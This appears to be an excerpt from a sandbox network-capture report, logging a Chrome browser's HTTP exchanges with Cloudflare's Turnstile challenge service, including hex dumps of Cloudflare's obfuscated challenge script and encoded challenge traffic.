                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c69375eff4612-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:48:01 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46
                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22
                                                                                                                                                Data Ascii: t":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_verifying":"Verifying...","turnstile_footer_privacy":"Privacy","turnstile_overrun_description":"Stuck%20here%3F","turnstile_footer_terms":"Terms","feedback_report_output_subtitle"
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 32 38 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 39 35 34 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 35 38 29 29 2f 38 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 32 33 29 29 2f 39 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 33 38 29 29 2f 31 30 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 36 39 38 29 29 2f 31 31 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 35 32 38 38 39 39 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 33 32 33 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 4d 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f
                                                                                                                                                Data Ascii: 28))/6*(parseInt(gK(954))/7)+parseInt(gK(1358))/8*(parseInt(gK(1523))/9)+-parseInt(gK(1538))/10+-parseInt(gK(698))/11,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,528899),eM=this||self,eN=eM[gL(323)],eO=function(f,gM,g,h,i,j,k,l,m){fo
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 70 4e 45 55 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 4b 4f 55 65 77 27 3a 67 4f 28 38 38 33 29 2c 27 75 77 42 63 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 58 4a 6b 69 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 43 67 47 44 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 6b 52 7a 77 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 68 54 5a 66 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 4d 6f 4c 58 72 27 3a 66 75 6e 63 74 69
                                                                                                                                                Data Ascii: h,i){return h-i},'pNEUc':function(h,i){return i!==h},'KOUew':gO(883),'uwBcZ':function(h,i){return h*i},'XJkiq':function(h,i){return i==h},'CgGDs':function(h,i){return h*i},'kRzwu':function(h,i){return h<i},'hTZff':function(h,i){return h!=i},'MoLXr':functi
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 31 29 3f 28 49 3d 30 2c 47 5b 67 51 28 31 34 36 37 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 67 51 28 37 31 39 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 67 51 28 31 35 30 31 29 5d 28 48 3c 3c 31 2c 4d 26 31 29 2c 49 3d 3d 64 5b 67 51 28 31 35 34 30 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 67 51 28 31 34 36 37 29 5d 28 64 5b 67 51 28 39 38 37 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 64 5b 67 51 28 32 37 37 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 67 51 28 37 31
                                                                                                                                                Data Ascii: 1)?(I=0,G[gQ(1467)](o(H)),H=0):I++,M>>=1,s++);}D--,0==D&&(D=Math[gQ(719)](2,F),F++),delete B[C]}else for(M=x[C],s=0;s<F;H=d[gQ(1501)](H<<1,M&1),I==d[gQ(1540)](j,1)?(I=0,G[gQ(1467)](d[gQ(987)](o,H)),H=0):I++,M>>=1,s++);C=(D--,d[gQ(277)](0,D)&&(D=Math[gQ(71
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 28 6a 2c 6b 29 7d 7d 2c 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 68 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 67 53 28 38 31 31 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 6a 2c 67 54 29 7b 72 65 74 75 72 6e 20 67 54 3d 67 53 2c 69 5b 67 54 28 36 31 37 29 5d 28 67 54 28 31 35 35 35 29 2c 67 54 28 31 35 35 35 29 29 3f 76 6f 69 64 20 30 3a 68 5b 67 54 28 36 32 33 29 5d 28 6a 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 55 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 67 55 3d 67 4f 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 64 5b 67 55 28 39 38 37 29 5d 28 6f 2c 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73
                                                                                                                                                Data Ascii: (j,k)}},h==null?'':h==''?null:f.i(h[gS(811)],32768,function(j,gT){return gT=gS,i[gT(617)](gT(1555),gT(1555))?void 0:h[gT(623)](j)})},'i':function(i,j,o,gU,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(gU=gO,s=[],x=4,B=4,C=3,D=[],G=d[gU(987)](o,0),H=j,I=1,E=0;3>E;s
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 67 55 28 39 35 36 29 5d 28 27 27 29 7d 69 66 28 64 5b 67 55 28 39 34 37 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 67 55 28 37 31 39 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4f 5d 29 4f 3d 73 5b 4f 5d 3b 65 6c 73 65 20 69 66 28 64 5b 67 55 28 39 32 30 29 5d 28 4f 2c 42 29 29 4f 3d 45 2b 45 5b 67 55 28 35 33 31 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 67 55 28 31 34 36 37 29 5d 28 4f 29 2c 73 5b 42 2b 2b 5d 3d 64 5b 67 55 28 39 35 39 29 5d 28 45 2c 4f 5b 67 55 28 35 33 31 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d 4f 2c 64 5b 67 55 28 31 34 31 34 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 67 55 28 37 31 39 29 5d 28 32 2c 43 29 2c 43 2b 2b
                                                                                                                                                Data Ascii: ;break;case 2:return D[gU(956)]('')}if(d[gU(947)](0,x)&&(x=Math[gU(719)](2,C),C++),s[O])O=s[O];else if(d[gU(920)](O,B))O=E+E[gU(531)](0);else return null;D[gU(1467)](O),s[B++]=d[gU(959)](E,O[gU(531)](0)),x--,E=O,d[gU(1414)](0,x)&&(x=Math[gU(719)](2,C),C++
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 5b 68 7a 28 31 37 33 29 5d 2c 4f 62 6a 65 63 74 5b 68 7a 28 31 34 34 39 29 5d 28 67 5b 68 7a 28 31 37 33 29 5d 29 29 3a 67 5b 68 7a 28 31 37 33 29 5d 3d 4a 53 4f 4e 5b 68 7a 28 31 32 35 39 29 5d 28 67 5b 68 7a 28 31 37 33 29 5d 29 2c 6d 3d 69 7c 7c 68 7a 28 38 35 33 29 2c 6e 3d 65 4d 5b 68 7a 28 37 30 31 29 5d 5b 68 7a 28 38 31 30 29 5d 3f 6b 5b 68 7a 28 31 34 31 36 29 5d 28 27 68 2f 27 2c 65 4d 5b 68 7a 28 37 30 31 29 5d 5b 68 7a 28 38 31 30 29 5d 29 2b 27 2f 27 3a 27 27 2c 6f 3d 6b 5b 68 7a 28 32 31 39 29 5d 28 6b 5b 68 7a 28 31 30 39 38 29 5d 28 6b 5b 68 7a 28 38 36 39 29 5d 2b 6e 2b 68 7a 28 36 39 37 29 2b 31 2c 6b 5b 68 7a 28 31 30 37 38 29 5d 29 2b 65 4d 5b 68 7a 28 37 30 31 29 5d 5b 68 7a 28 33 38 37 29 5d 2c 27 2f 27 29 2b 65 4d 5b 68 7a 28 37 30
                                                                                                                                                Data Ascii: [hz(173)],Object[hz(1449)](g[hz(173)])):g[hz(173)]=JSON[hz(1259)](g[hz(173)]),m=i||hz(853),n=eM[hz(701)][hz(810)]?k[hz(1416)]('h/',eM[hz(701)][hz(810)])+'/':'',o=k[hz(219)](k[hz(1098)](k[hz(869)]+n+hz(697)+1,k[hz(1078)])+eM[hz(701)][hz(387)],'/')+eM[hz(70
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 5d 5b 33 5d 2c 65 5b 68 41 28 31 37 32 29 5d 28 65 5b 68 41 28 31 35 36 33 29 5d 28 74 68 69 73 2e 68 5b 31 39 31 2e 36 39 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 41 28 36 32 33 29 5d 28 74 68 69 73 2e 68 5b 31 39 31 2e 31 39 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 32 36 29 2c 32 35 36 29 26 32 35 35 2e 39 32 29 2c 37 36 29 5e 74 68 69 73 2e 67 5d 7d 7d 65 6c 73 65 20 66 3d 4a 53 4f 4e 5b 68 41 28 31 32 35 39 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 68 41 28 31 30 37 35 29 5d 3d 66 2c 6d 5b 68 41 28 32 33 31 29 5d 3d 67 2c 6d 5b 68 41 28 35 32 30 29 5d 3d 68 2c 6d 5b 68 41 28 34 31 30 29 5d 3d 69 2c 6d 5b 68 41 28 31 37 33 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4c 28 38 33 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c
                                                                                                                                                Data Ascii: ][3],e[hA(172)](e[hA(1563)](this.h[191.69^this.g][1][hA(623)](this.h[191.19^this.g][0]++),26),256)&255.92),76)^this.g]}}else f=JSON[hA(1259)](d);return m={},m[hA(1075)]=f,m[hA(231)]=g,m[hA(520)]=h,m[hA(410)]=i,m[hA(173)]=d,m},eM[gL(831)]=function(d,e,f,g,
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 35 37 29 26 26 65 5b 69 73 28 36 33 30 29 5d 3d 3d 3d 69 73 28 39 35 37 29 3f 66 46 3d 64 5b 69 73 28 35 30 38 29 5d 28 73 65 74 49 6e 74 65 72 76 61 6c 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 67 38 28 29 7d 2c 31 65 33 29 3a 65 26 26 64 5b 69 73 28 31 30 30 33 29 5d 28 65 5b 69 73 28 35 32 37 29 5d 2c 64 5b 69 73 28 34 36 34 29 5d 29 26 26 65 5b 69 73 28 36 33 30 29 5d 3d 3d 3d 69 73 28 31 35 32 39 29 26 26 28 64 5b 69 73 28 35 35 32 29 5d 28 69 73 28 31 30 30 37 29 2c 69 73 28 31 30 30 37 29 29 3f 28 69 5b 69 73 28 31 32 35 35 29 5d 5b 69 73 28 31 31 38 30 29 5d 28 29 2c 6a 5b 69 73 28 31 32 35 35 29 5d 5b 69 73 28 32 30 31 29 5d 28 29 2c 6b 5b 69 73 28 31 32 35 35 29 5d 5b 69 73 28 34 36 38 29 5d 28 29 2c 6c 5b 69 73 28 31 32 35 35 29 5d 5b 69 73 28 33 33
                                                                                                                                                Data Ascii: 57)&&e[is(630)]===is(957)?fF=d[is(508)](setInterval,function(){g8()},1e3):e&&d[is(1003)](e[is(527)],d[is(464)])&&e[is(630)]===is(1529)&&(d[is(552)](is(1007),is(1007))?(i[is(1255)][is(1180)](),j[is(1255)][is(201)](),k[is(1255)][is(468)](),l[is(1255)][is(33


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                41192.168.2.1649771104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:01 UTC1149OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/529245995:1730132305:Laa5oq2m73aFLJir1YIIar-kFQTXq6O2pduGpfcbM2U/8d9c69278df22e27/PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 3172
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                CF-Challenge: PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:01 UTC3172OUTData Raw: 76 5f 38 64 39 63 36 39 32 37 38 64 66 32 32 65 32 37 3d 42 52 57 77 7a 77 76 77 51 77 67 77 4f 77 4a 45 58 2d 45 36 58 47 77 25 32 62 34 55 50 75 66 58 79 58 6a 59 77 2d 6f 77 58 24 57 58 4d 77 47 50 53 39 58 4c 77 53 34 50 77 36 66 47 57 58 66 77 73 52 66 53 70 58 42 45 64 58 2b 39 78 46 77 73 42 6f 4f 63 75 77 58 31 61 78 57 58 4a 58 55 6f 31 78 58 38 63 6f 58 69 58 43 70 62 58 24 77 53 66 58 62 44 38 75 50 6e 79 77 79 34 73 79 73 52 4b 4f 58 79 54 56 4c 5a 79 36 57 73 44 62 67 64 58 44 63 6f 50 6e 4d 38 24 58 79 6f 58 39 63 38 57 51 4a 50 56 41 53 2d 7a 46 53 57 56 4c 4d 34 34 58 66 2d 70 48 4a 51 72 6f 64 36 61 75 4e 58 58 4b 77 58 7a 67 6d 64 58 52 4d 44 39 4b 45 78 58 49 45 6a 45 4b 73 65 2b 70 63 39 52 70 77 73 6e 58 57 52 58 2d 77 53 44 58 53 4d
                                                                                                                                                Data Ascii: v_8d9c69278df22e27=BRWwzwvwQwgwOwJEX-E6XGw%2b4UPufXyXjYw-owX$WXMwGPS9XLwS4Pw6fGWXfwsRfSpXBEdX+9xFwsBoOcuwX1axWXJXUo1xX8coXiXCpbX$wSfXbD8uPnywy4sysRKOXyTVLZy6WsDbgdXDcoPnM8$XyoX9c8WQJPVAS-zFSWVLM44Xf-pHJQrod6auNXXKwXzgmdXRMD9KExXIEjEKse+pc9RpwsnXWRX-wSDXSM
                                                                                                                                                2024-10-28 16:48:01 UTC747INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:01 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 149752
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-gen: e8WFD9KGSfnHfcbpzuExg5xJS21saivp8jTc1iTFBb3hY2fAPdWNb2znu4BY9OYYhHRSqY6/0ma1kbqnwrYxQdjHj8jebSGUI6oE5iZh1Da2EHLAyaNKDWDijESugrYeS+7pJZsn8G4KTJVzxqPq7GYuVIsLr4km490NTfg98E84KD6uhuRvbrauothAi0hmot014a/zdCU1fUMM27jMaB3jhriTyd7W7WW9UJSn7U8oiRmp/7MxiZvT9vN+0DkILlO3OCBXZqqQn1B41e3uqUOJnNE82MDqZ3WYjuoErFGKhMEMoFWamHH2ptwHwPnJWmmF4zd+jfM6nIcgac5fgKX5+w8nnasF5z9hWDqVxL+kXelokGQfFstqQL5YR22366hFa+kzzHiFI0OiYGWG2uSLhT9T4irkodBFiwiHIXCkhH5fO1ISZptL2PqkqAaJUlyfH4AIFPuFUtMgWeZ1dXeM8v81DiRFHAhqOW87ss/bXCs=$1IcBMI/vTnvWGRwB
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c69382f60358d-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:48:01 UTC622INData Raw: 65 30 56 76 5a 5a 4e 75 62 31 4a 5a 63 70 68 56 57 56 35 64 58 47 47 67 70 57 4e 75 6c 4b 47 70 70 4b 6c 2f 70 36 4b 71 62 72 43 7a 72 70 32 70 70 33 4f 47 63 62 61 31 62 6f 2b 34 6b 58 61 4a 66 62 2b 76 75 37 53 51 6f 59 4b 6b 76 6f 79 6f 6e 61 71 50 69 72 4b 4b 6f 4c 4b 68 79 61 47 73 74 4a 69 53 71 64 2f 41 6b 73 7a 55 74 4f 43 39 32 71 54 51 31 74 72 6d 33 71 66 47 34 65 4f 2f 76 4f 47 30 77 38 44 6d 78 4e 62 54 36 74 7a 65 7a 64 79 32 31 37 76 56 76 39 48 42 78 39 66 65 78 2f 58 58 32 75 45 42 7a 4f 4c 66 41 67 76 6f 35 77 59 50 36 75 62 75 47 42 37 72 2b 50 6a 66 34 68 51 61 38 42 49 69 41 68 51 59 46 69 30 71 43 42 6f 44 34 2b 6f 46 42 77 63 6e 4c 79 55 57 4b 79 59 4c 45 7a 41 53 4b 6a 4d 38 49 7a 55 2f 49 7a 74 47 51 6a 38 6b 50 69 63 6e 4b 55 4d
                                                                                                                                                Data Ascii: e0VvZZNub1JZcphVWV5dXGGgpWNulKGppKl/p6KqbrCzrp2pp3OGcba1bo+4kXaJfb+vu7SQoYKkvoyonaqPirKKoLKhyaGstJiSqd/AkszUtOC92qTQ1trm3qfG4eO/vOG0w8DmxNbT6tzezdy217vVv9HBx9fex/XX2uEBzOLfAgvo5wYP6ubuGB7r+Pjf4hQa8BIiAhQYFi0qCBoD4+oFBwcnLyUWKyYLEzASKjM8IzU/IztGQj8kPicnKUM
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 51 66 55 47 4a 62 52 6c 30 35 58 6c 67 76 53 7a 70 62 58 6b 42 47 62 6b 78 46 54 6c 56 50 62 6c 6f 32 54 45 31 67 55 6e 6c 32 56 34 56 48 65 47 53 46 68 57 64 2f 65 34 69 4f 6a 49 53 54 67 6f 35 6f 59 46 61 56 65 32 53 57 56 31 5a 67 6c 33 74 2f 67 6c 64 2f 66 34 5a 6e 64 4b 70 36 61 34 2b 69 59 6f 39 73 72 57 75 55 67 49 6d 69 63 5a 53 79 74 36 57 34 71 49 6d 75 72 37 6d 34 6b 63 4b 46 74 4c 62 42 77 38 66 4a 6f 61 2b 4a 6a 4b 2b 54 78 72 54 4b 75 4d 58 48 6b 74 79 34 7a 35 71 32 75 4a 37 5a 31 4c 79 77 35 62 65 31 77 37 36 37 75 64 76 62 78 39 71 78 78 62 2f 67 76 75 6a 79 31 2f 62 52 31 76 76 37 75 4d 69 34 30 4c 53 35 42 64 58 53 35 50 58 7a 42 64 37 36 43 65 30 48 42 78 4d 41 7a 51 72 66 43 51 4d 44 37 2b 34 4e 42 67 6e 59 48 78 59 53 32 50 6f 65 33
                                                                                                                                                Data Ascii: QfUGJbRl05XlgvSzpbXkBGbkxFTlVPblo2TE1gUnl2V4VHeGSFhWd/e4iOjISTgo5oYFaVe2SWV1Zgl3t/gld/f4ZndKp6a4+iYo9srWuUgImicZSyt6W4qImur7m4kcKFtLbBw8fJoa+JjK+TxrTKuMXHkty4z5q2uJ7Z1Lyw5be1w767udvbx9qxxb/gvujy1/bR1vv7uMi40LS5BdXS5PXzBd76Ce0HBxMAzQrfCQMD7+4NBgnYHxYS2Poe3
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 4e 4e 31 35 59 4b 57 30 2f 61 6c 31 4d 59 6d 34 76 64 55 5a 74 57 7a 42 79 54 6d 42 5a 65 48 4f 44 68 6b 4e 35 59 56 4e 6d 53 30 6c 46 69 6f 5a 39 54 6f 42 4f 55 31 61 54 59 31 56 52 57 56 56 62 6b 58 4e 34 6d 31 74 73 56 6e 2b 6e 6e 35 43 58 6d 70 39 39 66 59 6d 66 69 32 68 37 6e 32 75 75 74 6e 53 4e 6c 71 68 30 75 58 32 59 76 35 61 30 6a 62 2b 7a 6e 63 53 5a 76 70 2b 37 6d 61 43 44 6a 4d 2b 35 76 61 71 77 76 63 65 33 77 39 61 53 32 4d 4f 76 33 5a 71 71 6d 73 2f 4d 77 63 37 5a 6f 75 54 66 78 4e 37 6f 76 38 48 43 78 72 2b 2f 36 4f 66 46 7a 65 79 76 77 37 54 56 31 72 62 59 36 39 6a 33 31 66 58 64 76 39 58 36 7a 2f 66 6f 2f 4f 6e 31 35 75 6f 45 2b 2b 6f 42 41 65 41 41 43 68 58 74 2b 65 37 6d 2f 64 55 64 49 52 41 42 39 4f 77 4e 38 79 59 6f 41 2f 67 49 4a 78
                                                                                                                                                Data Ascii: NN15YKW0/al1MYm4vdUZtWzByTmBZeHODhkN5YVNmS0lFioZ9ToBOU1aTY1VRWVVbkXN4m1tsVn+nn5CXmp99fYmfi2h7n2uutnSNlqh0uX2Yv5a0jb+zncSZvp+7maCDjM+5vaqwvce3w9aS2MOv3Zqqms/Mwc7ZouTfxN7ov8HCxr+/6OfFzeyvw7TV1rbY69j31fXdv9X6z/fo/On15uoE++oBAeAAChXt+e7m/dUdIRAB9OwN8yYoA/gIJx
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 54 69 78 65 56 48 42 6c 5a 54 56 52 4e 57 39 32 4f 6d 6f 36 66 57 39 64 63 58 5a 64 5a 6e 64 56 53 31 5a 41 66 47 46 52 5a 47 74 67 5a 47 65 56 56 35 42 74 63 33 74 34 63 4a 31 33 62 6e 4a 37 6d 56 74 35 70 5a 53 47 70 33 61 42 67 49 35 72 70 61 57 61 6b 49 2b 50 6b 61 36 49 68 48 4a 7a 73 4a 79 4e 64 59 6d 75 73 70 75 44 73 35 47 38 67 63 65 64 71 6f 6d 6b 71 71 4f 73 73 4c 50 43 69 71 4b 6c 79 4c 61 72 70 39 48 46 6a 37 4f 63 79 64 65 30 30 4e 2f 59 33 64 4c 61 30 65 48 4b 78 38 37 48 35 4f 57 77 75 2b 54 73 73 65 50 72 79 72 69 79 30 4b 37 46 35 74 63 43 77 64 48 36 74 74 75 34 36 4e 51 44 42 2f 59 46 31 76 66 6d 37 2f 6f 54 34 77 44 31 33 75 77 4c 34 2f 54 34 43 75 33 33 33 78 6b 58 38 50 51 4e 44 76 30 5a 49 66 4c 68 4b 77 77 45 34 41 66 34 44 77 41
                                                                                                                                                Data Ascii: TixeVHBlZTVRNW92Omo6fW9dcXZdZndVS1ZAfGFRZGtgZGeVV5Btc3t4cJ13bnJ7mVt5pZSGp3aBgI5rpaWakI+Pka6IhHJzsJyNdYmuspuDs5G8gcedqomkqqOssLPCiqKlyLarp9HFj7Ocyde00N/Y3dLa0eHKx87H5OWwu+TssePryriy0K7F5tcCwdH6ttu46NQDB/YF1vfm7/oT4wD13uwL4/T4Cu333xkX8PQNDv0ZIfLhKwwE4Af4DwA
                                                                                                                                                2024-10-28 16:48:01 UTC1369INData Raw: 31 74 70 57 48 64 67 56 46 51 34 54 34 42 5a 51 45 39 36 58 57 68 6e 53 46 78 36 68 32 70 37 59 6f 35 4e 6b 58 35 52 6c 57 52 73 68 4a 5a 39 6c 46 69 5a 66 46 78 78 6d 6f 4f 64 70 56 36 64 6d 70 69 56 58 36 31 71 63 49 70 6f 63 32 79 4e 6f 33 4f 42 64 58 71 77 65 35 61 56 65 38 47 72 6b 70 36 2b 68 5a 71 33 6d 49 57 57 68 59 79 4a 72 4a 65 47 77 4a 36 67 77 62 32 6e 78 5a 4f 74 72 61 4f 30 30 62 44 4e 71 38 47 79 71 38 32 76 75 64 58 44 6f 4c 75 7a 35 4e 6d 2b 33 65 43 35 78 4c 75 78 74 50 50 42 73 37 6d 30 35 37 61 39 37 2b 43 34 37 4d 33 42 32 38 44 66 78 67 6e 66 79 76 54 62 32 2b 66 36 35 38 50 76 30 52 4c 74 38 64 66 77 32 51 67 46 44 78 72 35 44 4e 6e 30 47 53 50 73 34 79 4c 32 43 4e 2f 34 4a 67 4d 42 44 68 33 36 4c 53 4d 31 39 44 49 33 47 50 4d 31
